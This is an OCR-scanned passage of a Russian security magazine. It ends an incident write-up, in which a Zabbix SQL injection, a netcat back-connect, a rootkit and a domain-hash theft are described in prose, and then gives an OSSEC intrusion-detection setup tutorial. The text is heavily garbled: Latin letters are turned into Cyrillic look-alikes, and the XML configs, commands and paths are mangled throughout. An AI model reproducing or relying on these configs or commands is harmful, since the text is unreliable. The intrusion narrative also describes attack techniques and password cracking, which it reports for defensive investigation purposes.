Последукзидии анализ әтого фаила показал, что он пр^чет сам себ^, маскирует 
при необходимости фаилы, предоставл^ет привилегии гоо! по команде. Управление 
ведетс^ через фаиловукз систему /ргос/гс. С сетыо не взаимодеиствует. 



Просмотр сетевых соединении в образе пам^ти показал, что веб-сервер с 2аоЫх 
доступен из интернета. Конечно, п об зтом не спрашивал, но подразумевал, что си- 
стему мониторинга в сетв никто не выставл^ет. Позже п ввтснил у администраторов, 
что они так след^т за системои, когда наход^тс^ вне офиса (несмотр^ на наличие 
\/Р1Ч-аккаунта у каждого). Удобно, ничего не скажешв. 

^ обратил внимание на 2аоЫх и пожалел, что не присмотрелс^ к нему ранв- 
ше, — верси^ была подозрителвно стара^ — 1.8.4. Поиск по ехр1оИ:-с1о.сот показал, 
что в даннои версии в скрипте рорир . рһр присутствует 501_-инБекиЈ/т, позвол^кзида^ 
получитв хеши полызователеи (СУЕ: 2011-4674). Проверка у^звимости показала ее 
полнукз работоспособноств. 

Далее при обследовании фаиловои системы был обнаружен остаток боевого ло- 
калвного әксплоита, статически собранныи бинарник псат, неболвшои веб-бәкдор. 

Схема подклкзчени^ злоумышленника стала очевидна: через веб-шелл запускал- 
с^ оаск соппест., предоставл^кзидии интерактивныи шелл, после чего привилегии 
повышалисв с помоидыо руткита. При такои схеме злоумышленник исполызовал 
әтот хост как промежуточныи дгт передачи зловреда на контроллер домена, а также 
дгт передачи базы пт_с15 . сШ: и 5Ү5ТЕМ. Дл^ әффективного поиска с помоидыо утили- 
ты тс15с1еер была создана база М05-хешеи всех фаилов, восстановленных с образа 
сервера, после чего среди них произведен поискхеша кеилоггера. Как резулвтат — 
искомыи фаил был наиден (правда, не с тем именем), а р^дом лежал рзехес и другие 
сопутствукзидие утилиты, которые были удалены. 
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Справка от руткита 

Теперв можно было точно сказатв, как произошел ини,идент: злоумышленник, 
восполвзовавшисв у^звимостыо 2аоЫх, получил и подобрал хеш парол^ админи- 
стратора 2аоЫх. С помоидыо скриптов 2аоЫх был загружен и запушен вспомогателв- 
ныи инструмент, в частности псат дгт создани^ обратного соединени^, с помоидыо 
которого был загружен и запуиден локалвныи әксплоит, — верси^ ^дра была полуто- 
рагодовалои давности. 

Кстати говор^, 2аоЫххранит скрипты в БД, и их следы были обнаружены в фаиле 
Јос!а1а1 . 
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Следы зксплуатаи,ии в БД Му501_ 

После повышени^ привилегии злоумышленник исполвзовал даннукз систему и по- 
добранные пароли, которые у одного из админов оказалисв одинаковыми как в до- 
мене, так и в Ыпих-системе, дл^ проникновени^ на контроллер домена. Получив 
доступ к контроллеру домена с правами администратора домена, злоумышленник 
завладел базои данных хешеи паролеи полвзователеи. Так как правила генераи,ии 
паролеи полызовател^ми были весвма простые, а пароли не мен^лисв по несколвко 
лет, они были подобраны без особого труда. Облада^ учетными данными болвшин- 
ства полызователеи, злоумышленник мог читатв их почту. 

Ради әксперимента п попробовал сбрутитв хеши полызователеи домена. Легко 
и непринужденно за пару часов были вскрыты 90% паролеи. 

По всеи видимости, когда злоумышленнику надоело просто читатв почту, он ре- 
шил ее удалитв — тем самым развлечвс^, или отомститв, или выполнитв заказ кон- 
курентов? Его мотиваии^ мне неизвестна. 

В итоге система 2аоЫх была переведена в изолированныи сегмент, сетевои тра- 
фик поставлен на записв, настроена 105. ^ ждал подклкзчении хулигана, но әто уже 
совсем друга^ истори^... 

Администраторам было рекомендовано восстановитв контроллер домена с бо- 
лее раннеи (до заражени^) резервнои копии, обновитв версикз Ыпих и 2аоЫх ском- 
прометированнои системы, помен^тв пароли. 
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Схема проникновенил во внутреннкж) сетв 
ВЕРДИКТ 

Настало врем^ подвести итоги. К сложившеис^ ситуаи,ии привели ошибки админи- 
стрировани^ сети и систем: 

• слаба^ паролвна^ политика — не установлена сложноств парол^, не установлен 
срокдеистви^ парол^; 

• отсутствует патч-менеджмент — кроме продуктов МјсгозоТ!, зав^занных на\/\/51Ј5, 
системы и софт не обновл^етс^; 

не везде установлено антивирусное ПО — например, на контроллере домена ан- 
тивирус, скорее всего, помог бы предупредитв кражу хешеи полвзователеи; 

• отсутствует едина^ политика по доступу в интернет, доступ разграничиваетс^ 
без вн^тных правил; 

• сетв не сегментирована; 

не осушествл^етс^ лог-менеджмент; 

• ленв. 

По возможности стараитесв избегатв зтого :). □!! 



Взлом 

За высоким 
забором 088ЕС 

ШВЕИиАРСКИИ НОЖДЛ^ ОБНАРУЖЕНИ^ ВЗЛОМОВ 



Обычныө сөтөвыө 1ӘЗ просто сканирукзт проход^ш,ии 
чөрөз их сөнсоры трафик. В отличиө от них ОЗЗЕС 
иш,өт аномалһныө событи^ исклкочителвно внутри си- 
стөмы. Нөудачныө попытки входа, «лишниө» открытыө 
порты, нөправилвна^ конфигураии^, измөнөниө ис- 
полн^өмыхили конфигураиионных фаилов, руткиты 
в систөмө — за всөм әтим поможетуследитв ОЗЗЕС. 
Кромө того, он умөөт запускатһ ВАЗН- или СМӘ- 
скрипт в качөствө рөакиии на опрөдөлөнныө событи^, 
что прөдоставл^өт почти бөзграничныө возможности 



ЗНАКОМСТВО 

Ну что ж, даваи знакомитыз^, 055ЕС — зто бесплатна^ һозЈ-оазес! система обнару- 
жени^ вторжении, распростран^кзида^с^ под лииензиеи Ө1Ч11 ӨР1_у2. Исходныи код 
проекта можно наити на ӨИ:Нио'е, а основным спонсором разработки выступает ком- 
пани^ Тгепс! МЈсго. 

055ЕС подразумевает несколвко вариантов установки. Основные: 

• зеп/ег — возможноств анализа локалвных логов и приема подклкзчении от аген- 
тов и зуз1од-серверов; 

• адеп1: — подклкзчение к серверу и пересылка туда логов дгт анализа. 

Еиде еств типы 1оса1 и һуопс!. 1_оса1 фактически представл^ет собои сервер без воз- 
можности приниматв внешние подклкзчени^ зуз1од или агентов, а һуопс! — одно- 
временнукз инсталл^иикз типов 1оса1 и адеп{. Самыи часто исполвзуемыи метод де- 
пло^ — клиент-серверныи. На отделвнукз машину устанавливаетс^ сервер, на все 
осталвные — агенты. После әтого между ними устанавливаетс^ зашишенное соеди- 
нение. Агентпересылаетнасерверлогидл^анализа, следитзаиелостноствкзфаилов, 
выполн^ет другие проверки. Сервер, в свокз очередв, генерирует сигналы тревоги, 
записывает әту информаи,икз в лог-фаил, базу данных, отправл^ет на зуз1од-сервер 
или на почту. Имеетс^ возможноств иентрализовано загружатв фаил конфигураи,ии 
агента с сервера. 

Что же может предпожитв әтот ореп зоигсе проект? Прежде всего анализ ло- 
гов, которые генерирукзтс^ на серверах и сетевом оборудовании. Помимо самого 
обычного однострочного зуз1од, поддерживакзтс^ логи 5пог{ (Ти11 и Тазх), 5дшс!, 115, 



по предотвраш,енигО вторжении. 




► Даниил Светлов 
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ЕуепИод, Му501_, Ро51дге501_, Арасһе. Также еств возможноств выполнитв лкзбукз ко- 
манду и обработатв ее вывод как лог. Чтобы не ставитв агент 055ЕС на сервер толвко 
ради анализа логов, лучше настроитв их пересылку по протоколу зуз1од на сервер 
055ЕС. 

Следитв за изменени^ми фаилов (контролв иелостности) тоже не проблема 
дгт 055ЕС. Необходимо задатв глобалвныи интервал проверки контролвных сумм. 
Дгт отделвных директории можно установитв мониторинг в реалвном времени. 
Дгт контрол^ иелостности на сетевых устроиствах и серверах, куда невозможно по- 
ставитв агент, еств возможноств настроитв проверку иелостности без его установки. 

Если завелисв руткиты, 055ЕС поможет их обнаружитв. Возможно, зти же функ- 
|дии можно было бы реализоватв набором сторонних утилит или своими скриптами, 
но тут все уже готово, стабилвно работает и обладает единым иентром управлени^. 

ТЕСТОВЫИ полигон 

Развернем 055ЕС в неболвшои сети, котора^ позволит исполвзоватв максималв- 
ное количество функи,ии. Ролв межсетевого әкрана у нас будет выполн^тв Сјзсо А5А, 
на отделвныи сервер, где установлен 5пог1:, зеркалируетс^ весв трафик, проход^- 
идии через фаирвол. Лог 5пог1: на әтом сервере мы будем анализироватв с помоидыо 
055ЕС. На веб-сервере будем анализироватв все логи, провер^тв сервер на нали- 
чие руткитов и иелостноств фаилов. Дгт отслеживани^ изменении в конфигураи,ии 
фаирвола исполвзуем функи,икз 055ЕС адеп1:1е55 сһеск, а дгт анализа логов будем 
отсылатв все логи с А5А пр^мо на сервер 055ЕС. Не будем обдел^тв вниманием 
и \ЛЛпс!о\л/5-сегмент нашеи сети. Установим на\Л/Јпс!о\л/5-серверы агент 055ЕС и под- 
клкзчим необходимые каналы ЕуепИод. Поехали! 
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УСТАНОВКА СЕРВЕРА 

До последнего времени 053ЕС распростран^ласв в виде архива с исходниками 
и скриптом инсталл^иии. При әтом во врем^ установки происходила компил^ии^ 
всех фаилов. Әто, конечно же, подразумевает установку компил^тора на сервер, 
куда мы устанавливаем 055ЕС. Около года назад пакеты дгт ВНЕ1_, Сеп.05 и Ғес!ога 
по^вилисв в репозитории компании А.опгпсогр, котора^ занимаетс^ разработкои 
заидииденного дистрибутива дгт хостинг-компании. Так что теперв установитв мож- 
но и из исходников, и из пакетов. Но при установке из пакетов необходимо учиты- 
ватв несколвко моментов. Первыи: многие глобалвные параметры 055ЕС задакзтс^ 
на әтапе компил^иии. Естественно, при установке из пакета ты не сможешв их изме- 
нитв. Ктаким параметрам относитс^, например, поддержкасохранени^ информаиии 
о сигналах тревоги в базы данных Му501_ и Роз1:дге501_. Второи момент заклкзчаетс^ 
в ванилвности сборки. Разработчики из А.опгпсогр накладывакзт на оригиналвные ис- 
ходники свои патчи. Чаиде всего әтот функи,ионал нужен толвко при исполвзовании 
055ЕС в дистрибутиве А.опгпсогр. В лкзбом случае он мен^ет поведение 055ЕС. Если 
функ1дионал әтих патчеи тебе не нужен, а устанавливатв все-таки хочетс^ из пакетов, 
ты можешв скачатв 5оигсе ВРМ, отредактироватв зрес-фаил и удалитв оттуда при- 
менение всех ненужных патчеи. Третии момент: пакеты еств толвко дгт ВРМ-оазес! 
дистрибутивов. Если у теб^ ОеЫап, (Јоип.и или, например, ҒгееВ50, ставитв придет- 
с^ из исходников. 

Итак, посколвку с настроикои стороннего репозитори^ и установкои оттуда пары 
пакетов каждыи справитс^, п предлагакз рассмотретв установку из исходников. Ка- 
чаи с офиииалвного саита архив. На данныи момент последн^^ верси^ 2.7.1. Рас- 
паковываи его и запускаи 1П5т_а11 . зһ. Убедисв, что ј_п5т_а11 . зһ, а также фаилы бгс/ 
1п5т_а115егуег . зһ и 5гс/1п5т_а11А§епт_ . 5һ имекгг права на исполнение. Сначала нам 
необходимо установитв сервернукз частв. Она также будет выполн^тв функи,ии аген- 
та на тои системе, куда установлена. Так что устанавливатв на сервер 055ЕС еиде 
и агент не придетс^. Дгт начала установим сервер. 

Скрипт инсталл^иии задаст несколвко вопросов. Первыи из них — выбор ^зыка, 
второи — тип инсталл^иии. Нам нужен тип 5еп/ег. Далее поидут вопросы о том, какие 
исполвзоватв функиии. Рекомендукз ставитв все опиии по умолчаникз за исклкзче- 
нием ас.ме гезропсе. Әто св^зано прежде всего с тем, что ас.ме гезропсе содержит 
в себе несколвко готовых скриптов, которые она может выполнитв при ложном сра- 
батывании правила. Позтому, пока ты не будешв досконалвно пониматв, как рабо- 
тает данна^ функи,и^, какие команды выполн^ет и при каких услови^х, не советукз 
ее активироватв. После әтого инсталл^тор совершит первичныи поиск логов на тво- 
ем сервере. Ему известно расположение всех стандартных логов, поддерживаемых 
ОС и программ. Если же скрипт не наидет какои-то важныи лог, то мы его сможем 
добавитв после инсталл^иии. После того как вс^ необходима^ информаии^ собрана, 
начнетс^ компил^ии^ и установка 055ЕС. 

СКАРМЛИВАЕМ ЛОГИ 

По умолчаникз 055ЕС устанавливаетс^ в папку /уаг/о55ес. Основнои конфиг, будв 
то сервер или агент, находитс^ по пути /уаг/о55ес/ет_с/о55ес . соп-Ғ. Посмотри 



на него внимателвно. Он сгенерирован на основе твоих ответов инсталл^тору и наи- 
денных логов. 

<1осаИп1е> 

< 1 о§_-Ғо гша "I: > 5 у 5 1о§ < / 1 о§_-Ғо гша 1: > 

<1осаТ:Јоп>/уаг/1о§/те5 5а§е5</1осаТ:Јоп> 
</1осаИп1е>^ 

Разделы 1оса1ТПе указывакзт тип и расположение логов. Проверв, что дл^ всех си- 
стемных лог-фаилов еств соответствукзидие записи в конфиге. Если твои сервер ра- 
ботает под управлением СепТ05 или ОеЫап, то, скорее всего, все логи будут наиде- 
ны автоматически. Но сеичас, как п говорил, можно добавитв недостакзидие. В пут^х 
к фаилам логов на *тх-системах также можно исполвзоватв символ * и форматы 
даты функ1дии ^зыка С зТгТһпле. Исполвзование пути /уаг/1о§/%Ү-%т-%с1/* . 1о§ будет 
корректным. Әто оченв удобно в тех случа^х, когда на сервере запуидены контеинеры 
1хс или орет/2. Достаточно поставитв 035ЕС на хостовукз машину и указатв еи с по- 
моидвк) маски на расположение логов всех контеинеров. Например, так: /уаг/1хс/*/ 
гоот_-Ғ5/уаг/1о§/* . 1о§. Ставитв 055ЕС на каждукз виртуалвнукз машину в таком слу- 
чае не нужно. 

^ уже писал, что еств возможноств выполнитв лкзбукз команду и обработатв ее 
вывод как лог. Не путаи әту функи,икз с асТК/е гезропсе. Команды асТме гезропсе сра- 
батывакгг при каких-то услови^х, сигналах тревоги, а команды из 1оса1ТНе выполн^- 
кзтс^ с определенным интервалом. В стандартном конфиге, которыи генерируетс^ 
при установке, еств парочка таких команд. Например, оченв полезна^ проверка от- 
крытых портов: 

<1осаИп1 е> 

<1 о§_-ҒогшаТ:>-Ғи11_соттапс1</1о§_-Ғогта1:> 
<-Ғгедиепсу>6Ө</-Ғгедиепсу> 

<соттапс1>пе1:51:а1: -"сап |§гер И5ТЕМ |§ге р -у 127.0.0 .1 | 50г1:</соттапс1> 
</1оса1^1е>^ 

Таким образом, если вдруг на твоем сервере изменитс^ количество открытых пор- 
тов, 055ЕС об зтом сообидит. 

НАСТРОИКА КОНТРОЛЛ 1ДЕЛОСТНОСТИ И ПОИСКА РУТКИТОВ 

Теперв даваи настроим контролв и,елостности фаилов на сервере. Длл әтого исполвзу- 
етсп раздел Бузсһеск. По умолчаникз проверка происходит каждые шеств часов. Воз- 
можна проверка контролвныхсумм поалгоритмам 5НА-1 (ошдил сһеск_5һа15ит=уе5), 
М05 (сһеск_то!55ит=уе5). Если исполвзоватв отдикз геа1т_п.те=уе5, то дл^ директо- 
рии можно устанавливатв контролв и,елостности в реалвном времени. Но учитываи, 
что контролв и,елостности запускаетс^ не сразу после перезапуска 055ЕС. Также при- 
годитс^ опиј/т герогт__сһап§е5=уе5. Какследует из названи^, при изменении фаилов 
она будет записыватв, какие именно изменени^ были проведены. 

В разделе <5у5сһеск> можно указыватв несколвко наборов <сИгест_ог:1е5>, каж- 
дыи со своими параметрами мониторинга. Единственное, что останетс^ неизмен- 
ным. — әто интеовал сканиоовани^. если не үказана опии^ геа1т_:1те=үе5. Дл^ үказа- 



ни^ путеи по маске оп^тв же можно исполвзоватв символ *. 

Директива 1§поге позвол^ет не провер^тв фаилы, а ошдил ге§ех предоставл^ет 
возможноств исполвзоватв регул^рные выражени^. Даваи настроим зузсһеск на на- 
шем сервере на мониторинг основных системных директории и будем отслеживатв 
изменени^ в папках .ззһ — вдруг кто-то решит добавитв лишнии публичныи клкзч. 
Должно получитвс^ примерно так: 

<5у5сһеск> 

<с1Јгес1:огЈе5 герог1:_сһап§е5="уе5" сһеск_а11="уе5" геа11:1те="уе5">/е1сЈ-^ 
</ (ЈЈгес1:огЈе5> 

<с!Јг ес"согЈе5 сһеск_а11="уе5" геа1тЈте="уе5">/Ып Ј /^Ып , /ҺооТј /и5г<- 
</ (ЈЈгес"согЈе 5> 

<сЈЈгес1:огЈе5 герох±_сһап§е5="уе5">/һоте/*/ . 55һ</сИгес1:ог1е5>^ 
<Ј§поге туре^"5ге§ех">.1о§$| .1:тр</Ј§п оге> 
</5у5сһеск> 

Раздел гооЈсһеск отвечает за настроики движка проверки системы на наличие рут- 
китов. Его настроики вполне можно оставитв стандартными. 

<гоотсһеск> 

<гоо"скЈ"с_1п1е5>/уаг/о5 5ес/е"сс/5һагес1/гоо1 :кЈ1:_^1е5 .1:х1:< /гоо"скЈ"с_<11е5> 
< г оо"ск Ј1:_1:г ојап5>/уаг/о5 5ес/е"сс/5һагес1/гоо"ск Ј1:_1: гојап5 .•сх"с</гоотк Ј1:_1: гојап5> 
<5у51:ет_аи<Ј11:>/үаг/о5 5ес/е1:с/5һаге(Ј/5у51:ет_аи(Ј11:_гс1.1:х1:</5у51:ет_аис11"^>^ 
<5у5"сет_аис1Ј1:>/уаг/о5 5ес/е1:с/5һагес1/сЈ5_с1еЫап _1Јпих_гс1 . 1:х1:</5у51:ет_аис1Ј1:> 
<5у5"сет_аиЫ"с>/уаг/о5 5ес/е"сс/5һагес1/сЈ5_гһе1 _1Јпих_гс1 .1:х1: </5у5тет_аис1Ј1:> 
< 5 у5"сет_аис1Ј"с>/уаг/о5 5ес/е"сс/5һагес1/с Ј5_гһе15_1Јпих_гс1 . тх1 :</5у5"сет_аис1Ј1:> 
</г оотсһеск> 

НАСТРОИКА АСТ1УЕ РЕ5РОЫСЕ 

<соттапс!> 

<пате>1пгеыа11-с1гор</соттапс1> 
^<ехеси"саЫе>1пгеыа11-с1гор. 5һ</ехеси"саЫе>^ 

<ехрес"с>5гсјр</ехрес1:> 
</соттапс!> 
<ас1 :Јуе-ге 5роп5е> 

<соттап<ј>1пгема11-Ыоск</соттапс1> 

<1оса"сЈоп>а11</1оса"сЈоп> 

<ги1е5_ §гоир>аи"сһеггсЈса"сЈоп_-ҒаЈ1ес1 ј аи"сһеггсЈса"сЈоп_-ҒаЈ1иге5 </ги1 е5_§гоир> 
<"С1теои"с>6ӨӨ</"С1теои1:> 
^гереа1:ес1_о-Ғ-Ғепс1ег5>ЗӨЈ 6Өј 12Ө</гереа1:ес1_о-Ғ-Ғепс1ег5>^ 
</асс1Үе-ге5роп5е>^ 



Разделы соттапа! и аст_з.уе-ге5роп5е позвол^кзт устанавливатв реаки,икз на срабаты- 
вание тех или иных сигналов тревоги. Команды должны заранее бытв оформлены 
в виде Вазһ-, стс!- или ЕхресЈ-скрипта и расположены в директории /уаг/оззес/ 



аст:1Уе- ге5роп5е/01п/ с правами на исполнение. 1 1ри сраоатывании правила скрипту 
будут переданы параметры, перечисленные в теге <ехрест_>. Правила дгт срабаты- 
вани^ скрипта указывакзтс^ в блоке <аст_1уе-ге5ропсе>. Услови^ могут бытв разно- 
образны — начина^ от уровн^ (<1еуе1>) и группы (<ги1е5_§гоир>) сигнала тревоги 
и заканчива^ конкретными 10 агента (а§епт__1с1) или правила (ги1е5_1с1). Команды 
могут выполн^твс^ как на агентах, так и на сервере. Простор дл^ твоего творчества 
тут ничто не ограничивает. Хочешв — отправл^и ЗМ5 о попытках подбора парол^, 
хочешв — сразу блокируи 1Р атакукзидего на фаирволе. 

ОТПРАВКА СОБЫТИИ НА ПОЧТУ 

Все сигналы тревоги 055ЕС записывает в свои текстовыи лог. Дгт оперативного опо- 
вешени^ о вторжени^х сервер может посылатв тебе почтовые сообидени^ со всеи 
необходимои информаи,иеи. В настроиках нужно указатв все данные дгт отправки 
почты. 

<етаЈ1_по!:Ј11са1:Јоп>уе5</етаЈ1_по1:И1са1:Јоп> 
<ета__1_"С0>те(д)ехатр1е . сот</етаЈ1_1:о> 
<5т1:р_5егүег>тх . ехатр1е . сот . . </5т1:р_5егүег>^ 
<етаИ_-Ғгот>055ес@ехатр1е . сот</етаИ_-Ғгот> 

Также можно указатв минималвныи уровенв алертов, которые будут отправл^твс^ 
на почту (<ета11_а1егт__1еуе1>10</ета:11_а1ег-г._1еуе1>), или конкретные 10 правил, 
которые сработали. Гибкости тут не менвше, чем в асХЫе гезропсе. 

УСТАНОВКА И НАСТРОИКА ОЗЗЕС-АГЕНТА НА *1Ч1Х-СЕРВЕРАХ 

Теперв, когда у нас уже еств сервер 055ЕС, самое врем^ установитв агенты на осталв- 
ные серверы. Агенты устанавливакзтс^ так же, как и сервер, с тои лишв разнии,еи, 
что при установке агента необходимо выбратв тип инсталл^иии Адеп1:. Точно так же, 
как и сервер, агент можно скомпилироватв на одном сервере, а установитв на другои. 

После установки агента его необходимо подклкзчитв к серверу. Дгт зтого на сер- 
вере запускаем фаил /уаг/о55ес/о1п/тапа§е_а§епт_5. Далее нажимаем А дгт добав- 
лени^ агента. Вводим им^ агента, его 1Р-адрес и утверждаем номер в списке. В каче- 
стве адреса можно исполвзоватв и,елукз подсетв. Здесв необходимо выбратв баланс 
между удобством и безопасностыо. Дело в том, что если у сервера сменитс^ адрес, 
то приход^шие от него сообидени^ будут отбрасыватвс^. То же самое, если ты ука- 
жешв подсетв. Если новыи адрес не будет в нее входитв, то ему не удастс^ подклкз- 
читвс^ к серверу. ^ обычно указывакз фиксированныи адрес дл^ серверов и подсетв 
класса С дгт рабочих стани,ии. 

После всех әтих операи,ии сервер выдаст тебе дпинныи клкзч, которыи необхо- 
димо перенести на агент безопасным способом. На сервере с агентом запускаем / 
уаг/055ес/01п/тапа§е_сНеп1:. Тут еств всего одна ошдил дл^ импорта клкзча. Наби- 
раем I и вводим клкзч, которыи перенесли с сервера 055ЕС. В фаиле конфигураи,ии 
агента еств почти все те же самые разделы, что и на сервере. Тут также указывакгг- 
с^ лог-фаилы, которые нужно анализироватв, директории и фаилы, которые нужно 
провер^тв на иелостноств, проверка на руткиты. Все әто настраиваетс^ точно также, 
как и на иентралвном сервере. Самое главное — нужно указатв 1Р-адрес иентралвно- 



го сервера, куда будет подклкзчатыз^ агент: 
<сПеггс> 

< 5 е г уе г -Ј р>192. 16 8.1.2</5 е г уе г -јр> 
</с1Јеггс> 

Теперв можно запускатв агент. Сразу проверв лог /уаг/о55ес/1о§/о55ес . 1о§. Там 
должно бытв сообидение об успешном подклкзчении к серверу. Теперв можешв про- 
веритв, что алерты генерирукзтс^, — заиди по 55Н на сервер. На сервере 055ЕС 
в фаиле /уаг/о55ес/1о£/а1егт_5/а1ег1: . 1о§ должно по^витвс^ соответствукзидее со- 
обшение. 

НАСТРОИКА ОЗЗЕС ДЛЛ СЕТЕВЫХ УСТРОИСТВ 

С настроикои 055ЕС на серверах закончили. Теперв даваи настроим работу с сете- 
выми устроиствами. Наша и,елв — анализ логов, поступакзидих с фаирвола, и контролв 
изменении конфигураи,ии. Дгт приема логов на иентралыном 055ЕС-сервере в фаил 
конфигураи,ии необходимо добавитв следукзидие строки: 

<гето"се> 

<соппес1:Јоп>5 у51о§</соппес1:Јоп> 
<рогс>5 14</ро гс> 

<а11оыесЈ-Јр5>192.168. 1.1</а 11оыес1-Јр5> 
</гето"се> 

Не забываи добавл^тв 1Р-адреса оборудовани^ в аПомеаЧрз. Иначе злоумышленник 
сможет с лкзбого узла сети слатв тебе фалвшивые логи. Затем необходимо переза- 
пуститв 055ЕС, и ты сможешв наблкздатв сигналы тревоги из обработанных логов 
фаирвола. 

Теперв исполвзуем адепт1е55 проверку конфигураи,ии. Прежде всего необхо- 
димо вклкзчитв в 055ЕС зту отдикз. Дл^ әтого выполни команду /уаг/о55ес/Ып/ 
о55ес-сопт_го1 епаЫе а§епт_1е55. Затем необходимо добавитв данные аутентифи- 
каи,ии дл^ нашего устроиства. Выполн^етс^ әто командои /уаг/о55ес/а§епт_1е55/ 
ге§15Т_ег_һо5Т_ . 5һ ас1с1 055ес@192 . 168 . 1 . 1 055ес_ра55 епаЫе_ра55. Как ты ви- 
дишв, необходимо указатв два парол^ — дгт полызовател^ и дгт епаЫе, если әто 
СЈзсо-деваис. Остаетс^ добавитв в фаил конфигура_дии следукзидие строки: 

<а§еп1:1е55>^ 

<"суре>5 5һ_а5а--Ғы5тсоп1п§_с1Ј -Ғ-Ғ< /1:уре> 
^оҒге^иепсу>36ӨӨ</-Ғге^иепсу>^ 

<һо51:>0 55ес@192 . 168 . 8 . 252</һо5Т>^ 

<5тате>р егЈос1Јс_с1Ј-Ғ-Ғ</51:а1:е> 
</а§еггс1е55> 

Обрати внимание, что строкавразделе<һо5Т>должнабытвтакоиже, какукзты ис- 
полвзовал в последнеи команде при регистра_дии хоста. Естественно, полызователв 
на устроистве должен бытв создан, паролв дл^ него установлен такои, как ты указал 



при регистраиии хоста, а с и^-адреса _»^з__-сервера должен оытв разрешен вход 
по 55Н. Теперв можно перезапуститв 055ЕС и проверитв логи. 



ИНТЕГРА1ДИЛ С ДРУГИМИ СИСТЕМАМИ 

Взаимодеиствие 055ЕС с другими системами организуетс^ в основном с помоидыо 
анализа лог-фаилов или отправки сигналов тревоги по протоколу зуз1од. Так, что- 
бы получатв уведомлени^ от 5пог1:, необходимо указатв агенту 055ЕС расположение 
лог-фаила Зпогт.: 



<1осаИп1е> 

<1о§_-Ғогта"С>5пог - с--Ға5"С</1о§_-Ғогта"С> 
^<1оса"С10п>/үаг/1о§/5пог1:/а1ег1:</1оса1:10п>^ 
</1осаИп1е>^ 

Обрати внимание, что 5пог1: может писатв логи в разных форматах — ТиП и Тазт. 
В 055ЕС дл^ нихеств разные отдии 1о§_-Ғогтат_ — 5пог1:--Ғи11 и 5погт_--Ға5т_ соответ- 
ственно. В случае с аппаратными 1Р5 необходимо также пересылатв их логи с помо- 
идыо зуз1од на и,ентралвныи сервер 055ЕС. 

055ЕС можно настроитв на отправку сигналов тревоги с иентралвного сервера 
в 51ЕМ-системы или просто на другои сервер дгт хранени^ по протоколу зуз1од: 



< 5 у 5 1 о§_о и "С р и £>_ 

<5егуег>192 . 168 . 1 . 3</5егүег>^ 
<рогт_ >514 </рог1:> 



<-Ғогтаг>с1е-Ғаи1"С</-Ғогта"С> 
</5у51о§_оигри"С^ 



УСТАНОВКА АГЕНТА ДЛЛ ОТШОООТЗ 

Установкаагентана\Л/Јпс!о\л/5почти ничем неотличаетс^, онужескомпилирован и рас- 
простран^етс^ с инсталл^тором. После установки агента его необходимо настроитв. 
Дл^ әтого запусти С : \Рго§гат ҒПе5 (х8б)\055ес-а§епт_\и/1п32и1 . ехе от имени ад- 
министратора. В открывшеес^ окно введи адрес сервера и клкзч, которыи сгенери- 
ровал на сервере. После зтого заиди в менкз Мапа§е и выбери 5т_аг1: 055ЕС. 

Если ты все сделал правилвно, то агент запуститс^ и подкл кзчитс^ к серверу. В тои 
же папке, куда установлен 055ЕС Адепт, находитс^ его фаил конфигураиии 055ес. 
соп-Ғ. От агента дгт *тх он отличаетс^ тем, что в качестве лог-фаилов дгт анализа 
исполвзукзтс^ названи^ еуепТ1од'ов, а контролв иелостности может осуидествл^твс^ 
не толвко дгт фаилов и папок, но и дл^ веток реестра. 



ф 0$5ЕС Адел* Мападег 
Мападс _1сл- НеЈр 

05-ЕСНШ5 ^27.1 




АдвпС: АиАһ кеу по1 јтрш(е_. |0Ј - 0 

Мезпд Бегсе* 1Р___ев. 

- Мо1 Пмпгппл 



Настроика агента на У\Лпс)о\л/5 



КАК ОБРАБАТЫ ВА10ТСЛ ЛОГИ 

Один из самых болвших разделов конфига сервера подклкзчает так называемые 
правила. Тут следует о6б^снитһ>, что правила в обработке логов и 5уз1од-сообш,е- 
нии не первичны. В первукз очередв строки логов поступакзт в так называемые деко- 
деры. Декодеры расположены в фаиле /уаг/о55ес/ет_с/о!есос1ег .хш1. Они бывакзт 
двух уровнеи. Родителвскии декодер срабатывает на название программы или ха- 
рактерное начало строки, дочерние декодеры обрабатывакзт конкретные сообидени^ 
от программы. Дгт примера посмотри на зти два декодера дгт 53Н: 




<с1есос1ег пате="55һсГ > 

<рго§гат_пате> л 5 5һс1</рго§гат_пате> 
</с1есос1ег>^ 

Первыи срабатывает исклкзчителвно на то, что в поле зу51од'а рго§гат_пате было 
значение 55һсЈ. 



<с1есос1ег пате="55һс!-5иссе55 "> 
<раге ггс>5 5һс1</рагеп 1:> 
<ргета"Ссһ> л Ассер"сес1</ргета"Ссһ> 

<ге§ ех о-Ғ-Ғ5е 1:="а-Ғ 1:ег_ргета1:сһ"> л \ 5+ - Ғ ог (\5+)-Ғгот (\5+) ро гт: </г е§ех> 
^огсЈег^и^ег Ј 5гсЈр</ огс!ег> 
</с!есос!ег>^ 

Второи декодер пытаетс^ обработатв строку толвко в том случае, если она удовлет- 
вор^ет услови^м первого: отди^ <рагепт_>55һск/рагеп1:> указывает на им^ роди- 
телвского декодера. В первукз очередв декодер пытаетс^ применитв к логу выраже- 
ние из оп1дии <ргета"ссһ>. Если әта операии^ успешна, то наступает самыи важныи 
момент в работе декодера. ОЗЗЕС извлекает из лога переменные, которые перечис- 
лены в оп1дии <огс1ег> с помоидыо регул^рного выражени^ из отдии <ге§ех>. 



Алгоритм работы 
декодера 



Вход^идии лог 



<с!есос1ег папле="55һсГ> 



<<Јесос1ег пате="55һс1-5иссе55"> 



<ргета^сһ> л Ассер^есК/ 
ргета1сһ> 



<гедех о^5е^="а^ег_ргета^сһ"> л \5+Тог(\5+)Тгот(\5+)рогК/гедех> 

<огс!ег>и5ег, 5гсЈр</огс!ег> 



115ег=Воо* 
5гсЈр=127. 0.0.1 



Теперв зти переменные передакзтс^ в правило, которое соответствует декодеру. 

Обрати внимание,чтоправилаимекзттакукзжедвухуровневукзструктуру. Призтом 
родителвское правило соответствует родителвскому декодеру: <с1есос1ес1_а5>55һс1</ 
с!есос!ес1 а5>. 



<ги!е ЈсЈ=" 57ӨӨ" 1еүе1="0" поа!ег1:= "1"> 
^сЈ е с осЈ е с1_а 5 > 5 5 һ с1 < / с1 е с ос1 ес1_а5>^ 

^сЈе^сг^р^огоББНО ше55а§е5 §гоирес1 . </6евсг1р-\:1ог\> 
</ги!е> 



После зтого лог попадает на обработку в дочерние правила. Их может бытв несколв- 
ко. Первое правилоу нихуказано в качестве родителвского: <1-Ғ_51с1>5700</1-Ғ_51с1>. 



<ги!е ЈсЈ= "5715" 1еуе1 ="4"> 
